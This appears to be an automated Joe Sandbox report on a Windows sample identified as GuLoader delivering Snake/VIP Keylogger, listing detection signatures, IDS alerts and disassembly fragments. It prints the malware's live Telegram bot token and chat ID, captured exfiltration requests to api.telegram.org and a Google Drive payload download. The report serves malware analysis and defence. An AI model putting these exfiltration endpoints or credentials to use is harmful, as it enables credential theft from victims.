Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
rJustificante67.exe

Overview

General Information

Sample name:rJustificante67.exe
Analysis ID:1617433
MD5:96bc48e7cc38d731e7e2c25f3f80a88e
SHA1:bd30afd2f438928b3cb98d9f74766f1e401db091
SHA256:79714172680d9fd5b1d49fc518abe9cef9200194a04b6611466beccb28c31728
Tags:exenjratuser-Porcupine
Infos:

Detection

GuLoader, Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious PE digital signature
Joe Sandbox ML detected suspicious sample
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • rJustificante67.exe (PID: 5876 cmdline: "C:\Users\user\Desktop\rJustificante67.exe" MD5: 96BC48E7CC38D731E7E2C25F3F80A88E)
    • rJustificante67.exe (PID: 6776 cmdline: "C:\Users\user\Desktop\rJustificante67.exe" MD5: 96BC48E7CC38D731E7E2C25F3F80A88E)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"C2 url": "https://api.telegram.org/bot7809339088:AAEUtMa_u0dd_zBfAWh2Ah2az4h6hNs_Wg0/sendMessage"}
{"Exfil Mode": "Telegram", "Token": "7809339088:AAEUtMa_u0dd_zBfAWh2Ah2az4h6hNs_Wg0", "Chat_id": "7618581100", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
00000003.00000002.3926681535.0000000032E31000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    00000003.00000002.3926681535.0000000032F4D000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
      00000003.00000002.3926681535.0000000032F4D000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000003.00000002.3926681535.0000000032F1A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000000.00000002.2422615423.000000000331C000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
            Click to see the 3 entries
            No Sigma rule has matched
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-02-17T23:09:25.328868+010028033053Unknown Traffic192.168.2.549873104.21.64.1443TCP
            2025-02-17T23:09:26.168408+010028033053Unknown Traffic192.168.2.549880104.21.64.1443TCP
            2025-02-17T23:09:27.035919+010028033053Unknown Traffic192.168.2.549886104.21.64.1443TCP
            2025-02-17T23:09:27.873644+010028033053Unknown Traffic192.168.2.549893104.21.64.1443TCP
            2025-02-17T23:09:28.696803+010028033053Unknown Traffic192.168.2.549899104.21.64.1443TCP
            2025-02-17T23:09:29.538363+010028033053Unknown Traffic192.168.2.549905104.21.64.1443TCP
            2025-02-17T23:09:30.353340+010028033053Unknown Traffic192.168.2.549911104.21.64.1443TCP
            2025-02-17T23:09:31.211671+010028033053Unknown Traffic192.168.2.549917104.21.64.1443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-02-17T23:09:23.488238+010028032742Potentially Bad Traffic192.168.2.549858132.226.247.7380TCP
            2025-02-17T23:09:24.706949+010028032742Potentially Bad Traffic192.168.2.549858132.226.247.7380TCP
            2025-02-17T23:09:25.613293+010028032742Potentially Bad Traffic192.168.2.549858132.226.247.7380TCP
            2025-02-17T23:09:26.425704+010028032742Potentially Bad Traffic192.168.2.549858132.226.247.7380TCP
            2025-02-17T23:09:27.300741+010028032742Potentially Bad Traffic192.168.2.549858132.226.247.7380TCP
            2025-02-17T23:09:28.144603+010028032742Potentially Bad Traffic192.168.2.549858132.226.247.7380TCP
            2025-02-17T23:09:28.956969+010028032742Potentially Bad Traffic192.168.2.549858132.226.247.7380TCP
            2025-02-17T23:09:29.800797+010028032742Potentially Bad Traffic192.168.2.549858132.226.247.7380TCP
            2025-02-17T23:09:30.613212+010028032742Potentially Bad Traffic192.168.2.549858132.226.247.7380TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-02-17T23:09:18.774047+010028032702Potentially Bad Traffic192.168.2.549826172.217.18.14443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-02-17T23:09:39.053659+010018100081Potentially Bad Traffic192.168.2.549970149.154.167.220443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-02-17T23:09:32.131584+010018100071Potentially Bad Traffic192.168.2.549922149.154.167.220443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: 00000003.00000002.3926681535.0000000032E31000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7809339088:AAEUtMa_u0dd_zBfAWh2Ah2az4h6hNs_Wg0", "Chat_id": "7618581100", "Version": "4.4"}
            Source: rJustificante67.exe.6776.3.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7809339088:AAEUtMa_u0dd_zBfAWh2Ah2az4h6hNs_Wg0/sendMessage"}
            Source: rJustificante67.exeVirustotal: Detection: 33%Perma Link
            Source: rJustificante67.exeReversingLabs: Detection: 32%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

            Location Tracking

            barindex
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_356B8790 CryptUnprotectData,3_2_356B8790
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_356B8EF1 CryptUnprotectData,3_2_356B8EF1
            Source: rJustificante67.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49864 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.5:49826 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.186.161:443 -> 192.168.2.5:49837 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49922 version: TLS 1.2
            Source: C:\Users\user\Desktop\rJustificante67.exeDirectory queried: number of queries: 1001
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 0_2_00402706 FindFirstFileW,0_2_00402706
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 0_2_00405731 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405731
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 0_2_004061E5 FindFirstFileW,FindClose,0_2_004061E5
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_00402706 FindFirstFileW,3_2_00402706
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_00405731 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,3_2_00405731
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_004061E5 FindFirstFileW,FindClose,3_2_004061E5
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 0266F45Dh3_2_0266F2C0
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 0266F45Dh3_2_0266F4AC
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 0266FC19h3_2_0266F961
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 34FB3308h3_2_34FB2EF0
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 34FB2D41h3_2_34FB2A90
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 34FB0D0Dh3_2_34FB0B30
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 34FB16F8h3_2_34FB0B30
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 34FBF781h3_2_34FBF4D8
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 34FBF329h3_2_34FBF080
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h3_2_34FB0853
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h3_2_34FB0040
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 34FBEED1h3_2_34FBEC28
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 34FBD069h3_2_34FBCDC0
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 34FBFBD9h3_2_34FBF930
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 34FB3308h3_2_34FB2EEB
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 34FBDD71h3_2_34FBDAC8
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h3_2_34FB0673
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 34FBD919h3_2_34FBD670
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 34FB3308h3_2_34FB3236
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 34FBD4C1h3_2_34FBD218
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 34FBEA79h3_2_34FBE7D0
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 34FBE621h3_2_34FBE378
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 34FBE1C9h3_2_34FBDF20
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 356B7EB5h3_2_356B7B78
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 356B9280h3_2_356B8FB0
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 356BC82Eh3_2_356BC560
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 356B0FF1h3_2_356B0D48
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 356B2A01h3_2_356B2758
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 356BE81Eh3_2_356BE550
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 356B55D1h3_2_356B5328
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 356B79C9h3_2_356B7720
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 356BB5EEh3_2_356BB320
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 356B25A9h3_2_356B2300
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 356BF5CEh3_2_356BF300
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 356BD5DEh3_2_356BD310
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 356BECAEh3_2_356BE9E0
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 356B18A1h3_2_356B15F8
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 356BCCBEh3_2_356BC9F0
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then mov esp, ebp3_2_356BB1C8
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 356B5E81h3_2_356B5BD8
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 356BDA6Eh3_2_356BD7A0
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 356B1449h3_2_356B11A0
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 356BBA7Eh3_2_356BB7B0
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 356B2E59h3_2_356B2BB0
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 356B5A29h3_2_356B5780
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 356BFA5Eh3_2_356BF790
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 356B3709h3_2_356B3460
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 356B4D21h3_2_356B4A78
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 356B7119h3_2_356B6E70
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 356BF13Eh3_2_356BEE70
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 356B02E9h3_2_356B0040
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 356BBF0Eh3_2_356BBC40
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 356B1CF9h3_2_356B1A50
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 356B48C9h3_2_356B4620
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 356B62D9h3_2_356B6030
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 356BDEFEh3_2_356BDC30
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 356B32B1h3_2_356B3008
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 356B6CC1h3_2_356B6A18
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 356B0B99h3_2_356B08F0
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 356B7571h3_2_356B72C8
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 356BE38Eh3_2_356BE0C0
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 356B5179h3_2_356B4ED0
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 356BC39Eh3_2_356BC0D0
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 356B2151h3_2_356B1EA8
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then mov esp, ebp3_2_356BB089
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 356B6733h3_2_356B6488
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 356BD14Eh3_2_356BCE80
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 356B0741h3_2_356B0498
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 35E86347h3_2_35E85FD8
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 35E86970h3_2_35E86678
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 35E842B6h3_2_35E83FE8
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 35E8F8E0h3_2_35E8F5E8
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 35E8CDD8h3_2_35E8CAE0
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 35E822C6h3_2_35E81FF8
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 35E8B5F0h3_2_35E8B2F8
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 35E810BEh3_2_35E80DF0
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 35E88AE8h3_2_35E887F0
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 35E83996h3_2_35E836C8
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 35E8E5C0h3_2_35E8E2C8
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 35E8BAB8h3_2_35E8B7C0
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 35E8A2D0h3_2_35E89FD8
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 35E8079Eh3_2_35E804D0
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 35E877C8h3_2_35E874D0
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 35E83076h3_2_35E82DA8
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 35E8D2A0h3_2_35E8CFA8
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 35E81E47h3_2_35E81BA0
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 35E8A798h3_2_35E8A4A0
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 35E85986h3_2_35E856B8
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 35E88FB0h3_2_35E88CB8
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 35E8FDA8h3_2_35E8FAB0
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 35E82756h3_2_35E82488
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 35E8BF80h3_2_35E8BC88
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 35E8154Eh3_2_35E81280
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 35E89478h3_2_35E89180
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 35E85066h3_2_35E84D98
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 35E87C90h3_2_35E87998
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 35E8EA88h3_2_35E8E790
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 35E8AC60h3_2_35E8A968
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 35E80C2Eh3_2_35E80960
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 35E88158h3_2_35E87E60
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 35E84746h3_2_35E84478
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 35E8D768h3_2_35E8D470
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 35E85E16h3_2_35E85B48
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 35E89940h3_2_35E89648
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 35E8030Eh3_2_35E80040
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 35E86E38h3_2_35E86B40
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 35E83E26h3_2_35E83B58
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 35E8EF50h3_2_35E8EC58
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 35E8C448h3_2_35E8C150
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 35E854F6h3_2_35E85228
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 35E88620h3_2_35E88328
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 35E8F418h3_2_35E8F120
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 35E83506h3_2_35E83238
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 35E8DC30h3_2_35E8D938
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 35E8B128h3_2_35E8AE30
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 35E84BD7h3_2_35E84908
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 35E87300h3_2_35E87008
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 35E8E0F8h3_2_35E8DE00
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 35E82BE6h3_2_35E82918
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 35E8C910h3_2_35E8C618
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 35E819DEh3_2_35E81710
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 35E89E08h3_2_35E89B10
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 35EB1FE8h3_2_35EB1CF0
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 35EB0CC8h3_2_35EB09D0
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 35EB1658h3_2_35EB1360
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 35EB0801h3_2_35EB0508
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 35EB1190h3_2_35EB0E98
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 35EB0338h3_2_35EB0040
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then jmp 35EB1B20h3_2_35EB1828
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then push 00000000h3_2_3601537D
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]3_2_36010F8E
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]3_2_36010C33
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]3_2_36010C78
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]3_2_36010BFD

            Networking

            barindex
            Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.5:49922 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49970 -> 149.154.167.220:443
            Source: unknownDNS query: name: api.telegram.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:936905%0D%0ADate%20and%20Time:%2017/02/2025%20/%2017:09:29%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20936905%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7809339088:AAEUtMa_u0dd_zBfAWh2Ah2az4h6hNs_Wg0/sendDocument?chat_id=7618581100&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd4f75dbc47cddHost: api.telegram.orgContent-Length: 582
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewIP Address: 104.21.64.1 104.21.64.1
            Source: Joe Sandbox ViewIP Address: 104.21.64.1 104.21.64.1
            Source: Joe Sandbox ViewIP Address: 132.226.247.73 132.226.247.73
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49858 -> 132.226.247.73:80
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49899 -> 104.21.64.1:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49873 -> 104.21.64.1:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49917 -> 104.21.64.1:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49893 -> 104.21.64.1:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49880 -> 104.21.64.1:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49886 -> 104.21.64.1:443
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49826 -> 172.217.18.14:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49911 -> 104.21.64.1:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49905 -> 104.21.64.1:443
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1nDB7ry8SARfoQUp67ibCPOyNMq9q_OUV HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
